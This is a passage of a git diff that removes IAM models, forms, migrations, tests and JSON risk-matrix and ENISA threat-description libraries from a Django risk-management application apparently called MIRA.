' - 'this form.' - ) - self.fields['password'].widget.attrs['class'] = 'text-sm -mb-1 password_update' - self.fields['is_active'].widget.attrs['class'] += ' -mt-1' - self.fields['user_groups'].widget = SearchableCheckboxSelectMultiple( - choices=self.fields['user_groups'].choices, - attrs={'class': 'text-sm rounded', - 'searchbar_class': '[&_.search-icon]:text-gray-500 text-sm border border-gray-300 rounded-t-lg px-3', - 'wrapper_class': 'border border-gray-300 bg-gray-50 text-gray-900 text-sm rounded-b-lg focus:ring-blue-500 focus:border-blue-500 py-2 px-4 max-h-56 overflow-y-scroll'} - ) - if password: - password.help_text = password.help_text.format( - reverse('password-change', - kwargs={'pk': user.pk} - )) - - field_order = ['email', 'password', 'first_name', 'last_name', 'is_active'] - - def clean_email(self): - email = self.cleaned_data.get("email") - return email.lower() - - class Meta: - """ for Model """ - model = User - fields = ['email', 'password', 'first_name', 'last_name', 'is_active', 'user_groups'] - - -class MyProfileUpdateForm(UserChangeForm, StyledModelForm): - """ form for logged user """ - # TODO: not sure this section is useful, self user could be in user list with a mention "me" - - def __init__(self, *args, user, **kwargs): - self.user = user - super().__init__(*args, **kwargs) - self.fields['email'].widget.attrs['readonly'] = True - self.fields['email'].help_text = _( - 'To change your email address, please contact your administrator.' - ) - self.fields['password'].widget.attrs['class'] = 'text-sm -mb-1 password_update' - password = self.fields.get('password') - self.fields['password'].help_text = _( - 'Raw passwords are not stored, so there is no way to see this ' - 'user’s password, but you can change the password using ' - 'this form.' - ) - if password: - password.help_text = password.help_text.format( - reverse('password-change', - kwargs={'pk': user.pk} - )) - - field_order = ['last_name', 'first_name', 'password', 'email'] - - class Meta: - model = User - exclude = ['last_login', 'is_superuser', 'date_joined', - 'user_permissions', 'user_groups', 'is_active', - 'first_login'] - - -class UserPasswordChangeForm(AdminPasswordChangeForm): - """ change user password form """ - - def __init__(self, user, *args, **kwargs): - super().__init__(user, *args, **kwargs) - for fname, f in self.fields.items(): - f.widget.attrs['class'] = 'bg-gray-50 border border-gray-300 text-gray-900 text-sm rounded-lg focus:ring-blue-500 focus:border-blue-500 block w-full p-2.5' - print('FNAME:', fname) - self.fields.get('password1').widget.attrs['id'] = 'password1' - self.fields.get('password2').widget.attrs['id'] = 'password2' - - -class UserGroupCreateForm(StyledModelForm): - """ form to create a user group """ - class Meta: - """ for Model """ - model = UserGroup - exclude = ['permissions', 'builtin'] - - -class UserGroupUpdateForm(StyledModelForm): - """ form to update a user group """ - class Meta: - """ for Model """ - model = UserGroup - exclude = ['permissions', 'builtin'] - - -class RoleAssignmentCreateForm(StyledModelForm): - """ form to create a RoleAssigment """ - class Meta: - """ for Model """ - model = RoleAssignment - exclude = ['builtin'] - - -class RoleAssignmentUpdateForm(StyledModelForm): - """ form to update a RoleAssigment """ - class Meta: - """ for Model """ - model = Role - fields = ['permissions'] - - def __init__(self, *args, **kwargs): - super().__init__(*args, **kwargs) - self.fields['permissions'].widget.attrs['class'] += ' h-96' diff --git a/iam/migrations/0001_initial.py b/iam/migrations/0001_initial.py deleted file mode 100644 index 1d07568..0000000 --- a/iam/migrations/0001_initial.py +++ /dev/null @@ -1,103 +0,0 @@ -# Generated by Django 4.2 on 2023-05-03 08:03 - -from django.conf import settings -from django.db import migrations, models -import django.db.models.deletion -import django.utils.timezone -import iam.models -import uuid - - -class Migration(migrations.Migration): - - initial = True - - dependencies = [ - ('auth', '0012_alter_user_first_name_max_length'), - ] - - operations = [ - migrations.CreateModel( - name='User', - fields=[ - ('password', models.CharField(max_length=128, verbose_name='password')), - ('last_login', models.DateTimeField(blank=True, null=True, verbose_name='last login')), - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('last_name', models.CharField(blank=True, max_length=150, verbose_name='last name')), - ('first_name', models.CharField(blank=True, max_length=150, verbose_name='first name')), - ('email', models.CharField(max_length=100, unique=True)), - ('first_login', models.BooleanField(default=True)), - ('is_active', models.BooleanField(default=True, help_text='Designates whether this user should be treated as active. Unselect this instead of deleting accounts.', verbose_name='active')), - ('date_joined', models.DateTimeField(default=django.utils.timezone.now, verbose_name='date joined')), - ('is_superuser', models.BooleanField(default=False, help_text='Designates that this user has all permissions without explicitly assigning them.', verbose_name='superuser status')), - ], - options={ - 'verbose_name': 'user', - 'verbose_name_plural': 'users', - 'permissions': (('backup', 'backup'), ('restore', 'restore')), - }, - managers=[ - ('objects', iam.models.UserManager()), - ], - ), - migrations.CreateModel( - name='Folder', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=200, verbose_name='Name')), - ('description', models.TextField(blank=True, null=True, verbose_name='Description')), - ('created_at', models.DateTimeField(auto_now_add=True, verbose_name='Created at')), - ('content_type', models.CharField(choices=[('GL', 'GLOBAL'), ('DO', 'DOMAIN')], default='DO', max_length=2)), - ('builtin', models.BooleanField(default=False)), - ('hide_public_asset', models.BooleanField(default=False)), - ('hide_public_matrix', models.BooleanField(default=False)), - ('hide_public_threat', models.BooleanField(default=False)), - ('hide_public_security_function', models.BooleanField(default=False)), - ('parent_folder', models.ForeignKey(default=iam.models._get_root_folder, null=True, on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='parent folder')), - ], - options={ - 'verbose_name': 'Folder', - 'verbose_name_plural': 'Folders', - }, - ), - migrations.CreateModel( - name='Role', - fields=[ - ('id', models.BigAutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')), - ('name', models.CharField(max_length=150, verbose_name='name')), - ('builtin', models.BooleanField(default=False)), - ('permissions', models.ManyToManyField(blank=True, to='auth.permission', verbose_name='permissions')), - ], - ), - migrations.CreateModel( - name='UserGroup', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('name', models.CharField(max_length=150, verbose_name='name')), - ('builtin', models.BooleanField(default=False)), - ('folder', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='Domain')), - ], - options={ - 'verbose_name': 'user group', - 'verbose_name_plural': 'user groups', - }, - ), - migrations.CreateModel( - name='RoleAssignment', - fields=[ - ('id', models.UUIDField(default=uuid.uuid4, editable=False, primary_key=True, serialize=False)), - ('is_recursive', models.BooleanField(default=False, verbose_name='sub folders are visible')), - ('builtin', models.BooleanField(default=False)), - ('folder', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='iam.folder', verbose_name='Folder')), - ('perimeter_folders', models.ManyToManyField(related_name='perimeter_folders', to='iam.folder', verbose_name='Domain')), - ('role', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='iam.role', verbose_name='Role')), - ('user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)), - ('user_group', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, to='iam.usergroup')), - ], - ), - migrations.AddField( - model_name='user', - name='user_groups', - field=models.ManyToManyField(blank=True, help_text='The user groups this user belongs to. A user will get all permissions granted to each of their user groups.', related_name='user_set', related_query_name='user', to='iam.usergroup', verbose_name='user groups'), - ), - ] diff --git a/iam/migrations/__init__.py b/iam/migrations/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/iam/models.py b/iam/models.py deleted file mode 100644 index 06b8b9c..0000000 --- a/iam/models.py +++ /dev/null @@ -1,461 +0,0 @@ -""" IAM model for MIRA - Inspired from Azure IAM model """ - -from collections import defaultdict -from typing import Any, Tuple -from typing_extensions import Self -import uuid -from django.utils import timezone -from django.db import connection, models -from django.contrib.auth.base_user import AbstractBaseUser, BaseUserManager -from django.contrib.auth.hashers import make_password -from django.contrib.auth.models import Permission -from django.utils.translation import gettext_lazy as _ -from django.urls.base import reverse_lazy -from mira import settings -from core.utils import BUILTIN_USERGROUP_CODENAMES, BUILTIN_ROLE_CODENAMES, UserGroupCodename -from core.base_models import AbstractBaseModel -from django.utils.http import urlsafe_base64_encode -from django.contrib.auth.tokens import default_token_generator -from django.utils.encoding import force_bytes -from django.template.loader import render_to_string -from django.core.mail import send_mail, get_connection, EmailMessage -from mira.settings import MIRA_URL, EMAIL_HOST_USER_RESCUE, EMAIL_HOST_PASSWORD_RESCUE, EMAIL_HOST_RESCUE, EMAIL_PORT_RESCUE, EMAIL_USE_TLS_RESCUE - - -class UserGroup(models.Model): - """ UserGroup objects contain users and can be used as principals in role assignments """ - id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) - folder = models.ForeignKey("Folder", verbose_name=_( - "Domain"), on_delete=models.CASCADE, default=None) - name = models.CharField(_('name'), max_length=150, unique=False) - builtin = models.BooleanField(default=False) - - class Meta: - """ for Model """ - verbose_name = _('user group') - verbose_name_plural = _('user groups') - - def __str__(self) -> str: - if self.builtin: - return f"{self.folder.name} - {BUILTIN_USERGROUP_CODENAMES.get(self.name)}" - return self.name - - @staticmethod - def get_user_groups(user): - # pragma pylint: disable=no-member - """ get the list of user groups containing the user given in parameter """ - user_group_list = [] - for user_group in UserGroup.objects.all(): - if user in user_group.user_set.all(): - user_group_list.append(user_group) - return user_group_list - - -class Role(models.Model): - """ A role is a list of permissions """ - permissions = models.ManyToManyField( - Permission, - verbose_name=_('permissions'), - blank=True, - ) - name = models.CharField(_('name'), max_length=150, unique=False) - builtin = models.BooleanField(default=False) - - def __str__(self) -> str: - if self.builtin: - return f"{BUILTIN_ROLE_CODENAMES.get(self.name)}" - return self.name - - -def _get_root_folder(): - """ helper function outside of class to facilitate serialization - to be used only in Folder class """ - try: - return Folder.objects.get(content_type=Folder.ContentType.ROOT) - except: - return None - - -class Folder(AbstractBaseModel): - """ A folder is a container for other folders or any object - Folders are organized in a tree structure, with a single root folder - Folders are the base perimeter for role assignments - """ - @staticmethod - def get_root_folder() -> Self: - """ class function for general use """ - return _get_root_folder() - - - class ContentType(models.TextChoices): - """ content type for a folder """ - ROOT = "GL", _("GLOBAL") - DOMAIN = "DO", _("DOMAIN") - - content_type = models.CharField( - max_length=2, choices=ContentType.choices, default=ContentType.DOMAIN) - parent_folder = models.ForeignKey( - "self", null=True, on_delete=models.CASCADE, verbose_name=_("parent folder"), - default=_get_root_folder) - builtin = models.BooleanField(default=False) - hide_public_asset = models.BooleanField(default=False) - hide_public_matrix = models.BooleanField(default=False) - hide_public_threat = models.BooleanField(default=False) - hide_public_security_function = models.BooleanField(default=False) - - class Meta: - """ for Model """ - verbose_name = _("Folder") - verbose_name_plural = _("Folders") - - def __str__(self) -> str: - return self.name.__str__() - - def sub_folders(self) -> Self: - """Return the list of subfolders""" - def sub_folders_in(f, sub_folder_list): - for sub_folder in f.folder_set.all(): - sub_folder_list.append(sub_folder) - sub_folders_in(sub_folder, sub_folder_list) - return sub_folder_list - return sub_folders_in(self, []) - - - def get_parent_folders(self) -> Self: - """Return the list of parent folders""" - return [self.parent_folder] + Folder.get_parent_folders(self.parent_folder) if self.parent_folder else [] - - @staticmethod - def get_folder(obj: Any) -> Self: - """Return the folder of an object""" - # todo: add a folder attribute to all objects to avoid introspection - if hasattr(obj, 'folder'): - return obj.folder - if hasattr(obj, 'parent_folder'): - return obj.parent_folder - if hasattr(obj, 'project'): - return obj.project.folder - if hasattr(obj, 'analysis'): - return obj.analysis.project.folder - if hasattr(obj, 'risk_scenario'): - return obj.risk_scenario.analysis.project.folder - -class FolderMixin(models.Model): - """ - Add foreign key to Folder - """ - folder = models.ForeignKey(Folder, on_delete=models.CASCADE, related_name='%(class)s_folder') - - class Meta: - abstract = True - - -class RootFolderMixin(FolderMixin): - """ - Add foreign key to Folder, defaults to root folder - """ - folder = models.ForeignKey( - Folder, - on_delete=models.CASCADE, - related_name='%(class)s_folder', - default=Folder.get_root_folder, - ) - - class Meta: - abstract = True - -class UserManager(BaseUserManager): - use_in_migrations = True - - def _create_user(self, email, password, **extra_fields): - """ - Create and save a user with the given email, and password. - """ - - if not email: - raise ValueError("The email must be set") - email = self.normalize_email(email) - user = self.model(email=email, **extra_fields) - if password: - user.password = make_password(password) - else: - user.password = make_password(str(uuid.uuid4())) - try: - user.mailing(email_template_name="registration/first_connexion_email.html", subject=_("Welcome to Mira!")) - except Exception as exception: - user.save(using=self._db) - raise exception - user.save(using=self._db) - return user - - def create_user(self, email, password=None, **extra_fields): - print("Creating user for", email) - extra_fields.setdefault("is_superuser", False) - return self._create_user(email, password, **extra_fields) - - def create_superuser(self, email, password=None, **extra_fields): - print("Creating superuser for", email) - extra_fields.setdefault("is_superuser", True) - if extra_fields.get("is_superuser") is not True: - raise ValueError("Superuser must have is_superuser=True.") - return self._create_user(email, password, **extra_fields) - - -class User(AbstractBaseUser): - """ a user is a principal corresponding to a human """ - try: - id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) - last_name = models.CharField(_('last name'), max_length=150, blank=True) - first_name = models.CharField(_('first name'), max_length=150, blank=True) - email = models.CharField(max_length=100, unique=True) - first_login = models.BooleanField(default=True) - is_active = models.BooleanField( - _('active'), - default=True, - help_text=_( - 'Designates whether this user should be treated as active. ' - 'Unselect this instead of deleting accounts.' - ), - ) - date_joined = models.DateTimeField(_('date joined'), default=timezone.now) - is_superuser = models.BooleanField( - _('superuser status'), - default=False, - help_text=_( - 'Designates that this user has all permissions without explicitly assigning them.' - ), - ) - user_groups = models.ManyToManyField( - UserGroup, - verbose_name=_('user groups'), - blank=True, - help_text=_( - 'The user groups this user belongs to. A user will get all permissions ' - 'granted to each of their user groups.' - ), - related_name="user_set", - related_query_name="user", - ) - objects = UserManager() - except: - print("Exception kludge") - - # USERNAME_FIELD is used as the unique identifier for the user - # and is required by Django to be set to a non-empty value. - # See https://docs.djangoproject.com/en/3.2/topics/auth/customizing/#django.contrib.auth.models.CustomUser.USERNAME_FIELD - USERNAME_FIELD = 'email' - REQUIRED_FIELDS = [] - - class Meta: - """ for Model """ - verbose_name = _('user') - verbose_name_plural = _('users') -# swappable = 'AUTH_USER_MODEL' - permissions = (("backup", "backup"), ("restore", "restore")) - - def __str__(self): - return f"{self.first_name} {self.last_name}" if self.first_name and self.last_name else self.email - - def get_full_name(self) -> str: - """get user's full name (i.e. first_name + last_name)""" - try: - full_name = f'{self.first_name} {self.last_name}' - return full_name - except: - return "" - - def get_short_name(self) -> str: - """get user's short name (i.e. first_name or email before @))""" - try: - return self.first_name if self.first_name else self.email.split('@')[0] - except: - return "" - - def mailing(self, email_template_name, subject, pk=False): - """ - Sending a mail to a user for password resetting or creation - """ - header = { - "email": self.email, - 'root_url': MIRA_URL, - "uid": urlsafe_base64_encode(force_bytes(self.pk)), - "user": self, - 'token': default_token_generator.make_token(self), - 'protocol': 'https', - 'pk': str(pk) if pk else None - } - email = render_to_string(email_template_name, header) - try: - send_mail(subject, email, None, [self.email], fail_silently=False, html_message=email) - print("mail sent to", self.email) - except Exception as e: - print(e) - #todo: move this to logger - print("primary mailer failure") - if EMAIL_HOST_RESCUE: - try: - with get_connection( - host=EMAIL_HOST_RESCUE, - port=EMAIL_PORT_RESCUE, - username=EMAIL_HOST_USER_RESCUE, - password=EMAIL_HOST_PASSWORD_RESCUE, - use_tls=EMAIL_USE_TLS_RESCUE if EMAIL_USE_TLS_RESCUE else False, - ) as new_connection: - EmailMessage(subject, email, None, [self.email],connection=new_connection).send() - print("mail sent to", self.email) - except Exception as ex2: - print(ex2) - print("secondary mailer failure") - - @property - def has_backup_permission(self) -> bool: - return RoleAssignment.has_permission(self, "backup") - - - @property - def edit_url(self) -> str: - """get the edit url of the user""" - return reverse_lazy(f"{self.__class__.__name__.lower()}-update", args=[self.id]) - - @property - def username(self): - return self.email - - @username.setter - def set_username(self, username): - self.email = username - - -class RoleAssignment(models.Model): - """ fundamental class for MIRA RBAC model, similar to Azure IAM model """ - id = models.UUIDField(primary_key=True, default=uuid.uuid4, editable=False) - perimeter_folders = models.ManyToManyField( - "Folder", verbose_name=_("Domain"), related_name='perimeter_folders') - user = models.ForeignKey(settings.AUTH_USER_MODEL, - null=True, on_delete=models.CASCADE) - user_group = models.ForeignKey( - UserGroup, null=True, on_delete=models.CASCADE) - role = models.ForeignKey( - Role, on_delete=models.CASCADE, verbose_name=_("Role")) - is_recursive = models.BooleanField( - _('sub folders are visible'), default=False) - builtin = models.BooleanField(default=False) - folder = models.ForeignKey( - Folder, on_delete=models.CASCADE, verbose_name=_("Folder")) - - def __str__(self) -> str: - # pragma pylint: disable=no-member - return "id=" + str(self.id) + \ - ", folders: " + str(list(self.perimeter_folders.values_list('name', flat=True))) + \ - ", role: " + str(self.role.name) + \ - ", user: " + (str(self.user.email) if self.user else "/") + \ - ", user group: " + (str(self.user_group.name) - if self.user_group else "/") - - @staticmethod - def is_access_allowed(user: User, perm: Permission, folder: Folder) -> bool: - """ - Determines if a user has specified permission on a specified folder - """ - for ra in RoleAssignment.get_role_assignments(user): - # TODO: Add recursive call when we allow picking a parent folder other than ROOT - if (folder in ra.perimeter_folders.all() or folder.parent_folder in ra.perimeter_folders.all()) and perm in ra.role.permissions.all(): - return True - return False - - @staticmethod - def get_accessible_folders(folder: Folder, user: User, content_type: Folder.ContentType, codename: str="view_folder") -> list[Folder]: - """Gets the list of folders with specified contentType that can be viewed by a user from a given folder - If the contentType is not specified, returns all accessible folders - Returns the list of the ids of the matching folders - If permission is specified, returns accessible folders which can be altered with this specific permission""" - folders_set = set() - ref_permission = Permission.objects.get(codename=codename) - # first get all accessible folders, independently of contentType - for ra in [x for x in RoleAssignment.get_role_assignments(user) if ((Permission.objects.get(codename="view_folder") in x.role.permissions.all()) and (ref_permission in x.role.permissions.all()))]: - for f in ra.perimeter_folders.all(): - folders_set.add(f) - folders_set.update(f.sub_folders()) - # calculate perimeter - perimeter = set() - perimeter.add(folder) - perimeter.update(folder.sub_folders()) - # return filtered result - return [x.id for x in folders_set if (x.content_type == content_type if content_type else True) and x in perimeter] - - @staticmethod - def get_accessible_object_ids(folder: Folder, user: User, object_type: Any) -> Tuple['list[Any]', 'list[Any]', 'list[Any]']: - """ Gets all objects of a specified type that a user can reach in a given folder - Only accessible folders are considered - Returns a triplet: (view_objects_list, change_object_list, delete_object_list) - Assumes that object type follows Django conventions for permissions - Also retrieve published objects in view - """ - class_name = object_type.__name__.lower() - permissions = [ - Permission.objects.get(codename="view_" + class_name), - Permission.objects.get(codename="change_" + class_name), - Permission.objects.get(codename="delete_" + class_name) - ] - - folders_with_local_view = set() - permissions_per_object_id = defaultdict(set) - ref_permission = Permission.objects.get(codename="view_folder") - all_objects = object_type.objects.all() - folder_for_object = {x: Folder.get_folder(x) for x in all_objects} - perimeter = set() - perimeter.add(folder) - perimeter.update(folder.sub_folders()) - for ra in [x for x in RoleAssignment.get_role_assignments(user) if ref_permission in x.role.permissions.all()]: - ra_permissions = ra.role.permissions.all() - for my_folder in perimeter & set(ra.perimeter_folders.all()): - target_folders = [my_folder] + \ - my_folder.sub_folders() if ra.is_recursive else [my_folder] - for p in [p for p in permissions if p in ra_permissions]: - if p == permissions[0]: - folders_with_local_view.add(my_folder) - for object in [x for x in all_objects if folder_for_object[x] in target_folders]: - # builtins objects cannot be edited or deleted - if not (hasattr(object, "builtin") and object.builtin and p != permissions[0]): - permissions_per_object_id[object.id].add(p) - - if hasattr(object_type, "is_published"): - for my_folder in folders_with_local_view: - target_folders = [] - my_folder2 = my_folder - while my_folder2 and not getattr(my_folder2, f"block_published_{class_name}", False): - if my_folder2 != my_folder: - target_folders.append(my_folder2) - my_folder2 = my_folder2.parent_folder - for object in [x for x in all_objects if folder_for_object[x] in target_folders and x.is_published]: - permissions_per_object_id[object.id].add(permissions[0]) - - return ( - [x for x in permissions_per_object_id if permissions[0] - in permissions_per_object_id[x]], - [x for x in permissions_per_object_id if permissions[1] - in permissions_per_object_id[x]], - [x for x in permissions_per_object_id if permissions[2] - in permissions_per_object_id[x]], - ) - - def is_user_assigned(self, user) -> bool: - """ Determines if a user is assigned to the role assignment""" - return user == self.user or (self.user_group and self.user_group in UserGroup.get_user_groups(user)) - - @staticmethod - def get_role_assignments(user): - """ get all role assignments attached to a user directly or indirectly""" - assignments = list(user.roleassignment_set.all()) - for user_group in UserGroup.get_user_groups(user): - assignments += list(user_group.roleassignment_set.all()) - return assignments - - def has_permission(user, codename): - """ Determines if a user has a specific permission. To be used cautiously with proper commenting """ - for ra in RoleAssignment.get_role_assignments(user): - for perm in ra.role.permissions.all(): - if perm.codename == codename: - return True - return False diff --git a/iam/tests/__init__.py b/iam/tests/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/iam/tests/test_models.py b/iam/tests/test_models.py deleted file mode 100644 index 6bab499..0000000 --- a/iam/tests/test_models.py +++ /dev/null @@ -1,46 +0,0 @@ -from uuid import UUID -from core.models import * -from core.models import * -from iam.models import * -from library.utils import * -import pytest -from django.contrib.auth import get_user_model - -User = get_user_model() - -@pytest.fixture -def root_folder_fixture(): - Folder.objects.create( - name="Global", content_type=Folder.ContentType.ROOT, builtin=True) - - -@pytest.mark.django_db -class TestFolder: - pytestmark = pytest.mark.django_db - - def test_folder_creation(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - folder = Folder.objects.create(name="Folder", parent_folder=root_folder) - assert folder.name == "Folder" - assert folder.parent_folder == root_folder - assert folder.content_type == Folder.ContentType.DOMAIN - - def test_folder_creation_same_name(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - Folder.objects.create(name="Folder", parent_folder=root_folder) - with pytest.raises(ValidationError): - Folder.objects.create(name="Folder", parent_folder=root_folder) - - def test_folder_creation_same_name_different_parent(self, root_folder_fixture): - root_folder = Folder.objects.get(content_type=Folder.ContentType.ROOT) - parent_folder = Folder.objects.create(name="Parent", parent_folder=root_folder) - - folder1 = Folder.objects.create(name="Folder", parent_folder=root_folder) - folder2 = Folder.objects.create(name="Folder", parent_folder=parent_folder) - assert folder1.name == "Folder" - assert folder2.name == "Folder" - assert folder1.content_type == Folder.ContentType.DOMAIN - assert folder2.content_type == Folder.ContentType.DOMAIN - assert folder1.parent_folder == root_folder - assert folder2.parent_folder == parent_folder - \ No newline at end of file diff --git a/iam/views.py b/iam/views.py deleted file mode 100644 index 1376c2d..0000000 --- a/iam/views.py +++ /dev/null @@ -1,5 +0,0 @@ -from django.shortcuts import render - -# Create your views here. - -# TODO: migrate views related to IAM here \ No newline at end of file diff --git a/library/__init__.py b/library/__init__.py deleted file mode 100644 index e69de29..0000000 diff --git a/library/admin.py b/library/admin.py deleted file mode 100644 index 846f6b4..0000000 --- a/library/admin.py +++ /dev/null @@ -1 +0,0 @@ -# Register your models here. diff --git a/library/apps.py b/library/apps.py deleted file mode 100644 index c33ac9c..0000000 --- a/library/apps.py +++ /dev/null @@ -1,6 +0,0 @@ -from django.apps import AppConfig - - -class LibraryConfig(AppConfig): - default_auto_field = 'django.db.models.BigAutoField' - name = 'library' diff --git a/library/forms.py b/library/forms.py deleted file mode 100644 index 1679c04..0000000 --- a/library/forms.py +++ /dev/null @@ -1,6 +0,0 @@ -from django import forms -from django.utils.translation import gettext_lazy as _ -from library.validators import validate_file_extension - -class UploadFileForm(forms.Form): - file = forms.FileField(required=True, label=_('Select a file'), validators=[validate_file_extension]) diff --git a/library/libraries/3x3 critical matrix.json b/library/libraries/3x3 critical matrix.json deleted file mode 100644 index 224d5d8..0000000 --- a/library/libraries/3x3 critical matrix.json +++ /dev/null @@ -1,35 +0,0 @@ -{ - "locale": "en", - "name": "Critical matrix 3x3", - "description": "Critical matrix 3x3", - "format_version": "1.0", - "objects": [ - { - "type": "matrix", - "fields": { - "name": "critical", - "description": "critical matrix", - "probability" : [ - {"abbreviation": "L", "name": "Low", "description": "Unfrequent event"}, - {"abbreviation": "M", "name": "Medium", "description": "Occasional event"}, - {"abbreviation": "H", "name": "High", "description": "Frequent event"} - ], - "impact": [ - {"abbreviation": "L", "name": "Low", "description": "Low impact"}, - {"abbreviation": "M", "name": "Medium", "description": "Medium impact"}, - {"abbreviation": "H", "name": "High", "description": "High impact"} - ], - "risk": [ - {"abbreviation": "L", "name": "Low", "description": "acceptable risk", "hexcolor": "#00FF00"}, - {"abbreviation": "M", "name": "Medium", "description": "risk requiring mitigation within 2 years", "hexcolor": "#FFFF00"}, - {"abbreviation": "H", "name": "High", "description": "unacceptable risk", "hexcolor": "#FF0000"} - ], - "grid": [ - [0, 1, 1], - [1, 1, 2], - [1, 2, 2] - ] - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/3x3_owasp_matrix.json b/library/libraries/3x3_owasp_matrix.json deleted file mode 100644 index 5d11c6c..0000000 --- a/library/libraries/3x3_owasp_matrix.json +++ /dev/null @@ -1,37 +0,0 @@ -{ - "locale": "en", - "name": "OWASP basic matrix 3x3", - "description": "OWASP basic matrix 3x3", - "format_version": "1.0", - "objects": [ - { - "type": "matrix", - "fields": { - "name": "owasp", - "description": "owasp matrix", - "probability" : [ - {"abbreviation": "L", "name": "Low", "description": "rare"}, - {"abbreviation": "M", "name": "Medium", "description": "occasional"}, - {"abbreviation": "H", "name": "High", "description": "frequent"} - ], - "impact": [ - {"abbreviation": "L", "name": "Low", "description": "minimal"}, - {"abbreviation": "M", "name": "Medium", "description": "moderate"}, - {"abbreviation": "H", "name": "High", "description": "severe"} - ], - "risk": [ - {"abbreviation": "N", "name": "Note", "description": "Note", "hexcolor": "#A6EC99"}, - {"abbreviation": "L", "name": "Low", "description": "Low", "hexcolor": "#FFFF54"}, - {"abbreviation": "M", "name": "Medium", "description": "Medium", "hexcolor": "#F2A93B"}, - {"abbreviation": "H", "name": "High", "description": "High", "hexcolor": "#F5C2CB"}, - {"abbreviation": "C", "name": "Critical", "description": "Critical", "hexcolor": "#EA3323"} - ], - "grid": [ - [0, 1, 2], - [1, 2, 3], - [2, 3, 4] - ] - } - } - ] -} diff --git a/library/libraries/5x5 critical matrix.json b/library/libraries/5x5 critical matrix.json deleted file mode 100644 index c6c595e..0000000 --- a/library/libraries/5x5 critical matrix.json +++ /dev/null @@ -1,43 +0,0 @@ -{ - "locale": "en", - "name": "Critical matrix 5x5", - "description": "Critical matrix 5x5", - "format_version": "1.0", - "objects": [ - { - "type": "matrix", - "fields": { - "name": "default_5x5", - "description": "critical matrix", - "probability" : [ - {"abbreviation": "VL", "name": "Very Low", "description": "Very unfrequent event"}, - {"abbreviation": "L", "name": "Low", "description": "Unfrequent event"}, - {"abbreviation": "M", "name": "Medium", "description": "Occasional event"}, - {"abbreviation": "H", "name": "High", "description": "Frequent event"}, - {"abbreviation": "VH", "name": "Very High", "description": "Very frequent event"} - ], - "impact": [ - {"abbreviation": "VL", "name": "Very Low", "description": "Very low impact"}, - {"abbreviation": "L", "name": "Low", "description": "Low impact"}, - {"abbreviation": "M", "name": "Medium", "description": "Medium impact"}, - {"abbreviation": "H", "name": "High", "description": "High impact"}, - {"abbreviation": "VH", "name": "Very High", "description": "Very high impact"} - ], - "risk": [ - {"abbreviation": "VL", "name": "Very Low", "description": "negligible risk", "hexcolor": "#BBF7D0"}, - {"abbreviation": "L", "name": "Low", "description": "acceptable risk", "hexcolor": "#BEF264"}, - {"abbreviation": "M", "name": "Medium", "description": "risk requiring mitigation within 2 years", "hexcolor": "#FEF08A"}, - {"abbreviation": "H", "name": "High", "description": "risk requiring mitigation within 6 months", "hexcolor": "#FBBF24"}, - {"abbreviation": "VH", "name": "Very High", "description": "unacceptable risk", "hexcolor": "#F87171"} - ], - "grid": [ - [0, 0, 1, 1, 2], - [0, 1, 1, 2, 2], - [1, 1, 2, 2, 3], - [1, 2, 2, 3, 4], - [2, 2, 3, 4, 4] - ] - } - } - ] -} \ No newline at end of file diff --git a/library/libraries/Enisa threat landscape 2022.json b/library/libraries/Enisa threat landscape 2022.json deleted file mode 100644 index 2989498..0000000 --- a/library/libraries/Enisa threat landscape 2022.json +++ /dev/null @@ -1,73 +0,0 @@ -{ - "locale": "en", - "name": "ENISA threat landscape 2022", - "description": "threats from Enisa Threat Landscape 2022 report", - "format_version": "1.0", - "copyright": "COPYRIGHT NOTICE\n© European Union Agency for Cybersecurity (ENISA), 2022\nReproduction is authorised provided the source is acknowledged.", - "objects": [ - { - "type": "threat", - "fields": { - "name": "Ransomware", - "description": "According to ENISA’s Threat Landscape for Ransomware Attacks report, ransomware is defined as a type of attack where threat actors take control of a target’s assets and demand a ransom in exchange for the return of the asset’s availability. This action-agnostic definition is needed to cover the changing ransomware threat landscape, the prevalence of multiple extortion techniques and the various goals, other than solely financial gains, of the perpetrators. Ransomware has been, once more, one of the prime threats during the reporting period, with several high profile and highly publicised incidents.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Malware", - "description": "Malware, also referred to as malicious code and malicious logic, is an overarching term used to describe any software or firmware intended to perform an unauthorised process that will have an adverse impact on the confidentiality, integrity or availability of a system. Traditionally, examples of malicious code types include viruses, worms, trojan horses or other code-based entities that infect a host. Spyware and some forms of adware are also examples of malicious code. During this reporting period, we again observed a large number of incidents involving malware. The incidents analysed are mainly focused on EU countries.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Social Engineering", - "description": "Social engineering encompasses a broad range of activities that attempt to exploit a human error or human behaviour with the objective of gaining access to information or services. It uses various forms of manipulation to trick victims into making mistakes or handing over sensitive or secret information. In cybersecurity, social engineering lures users into opening documents, files or e-mails, visiting websites or granting unauthorised persons access to systems or services. And although these tricks can abuse technology they always rely on a human element to be successful. This threat canvas consists mainly of the following vectors: phishing, spear- phishing, whaling, smishing, vishing, business e-mail compromise (BEC), fraud, impersonation and counterfeit, which are analysed in the relevant chapter.", - "provider": "ENISA" - } - }, - { - "type": "threat", - "fields": { - "name": "Threats against data", - "description": "Threats against data form a collection of threats that target sources of data with the aim of gaining unauthorised access and disclosure, as well as manipulating data to interfere with 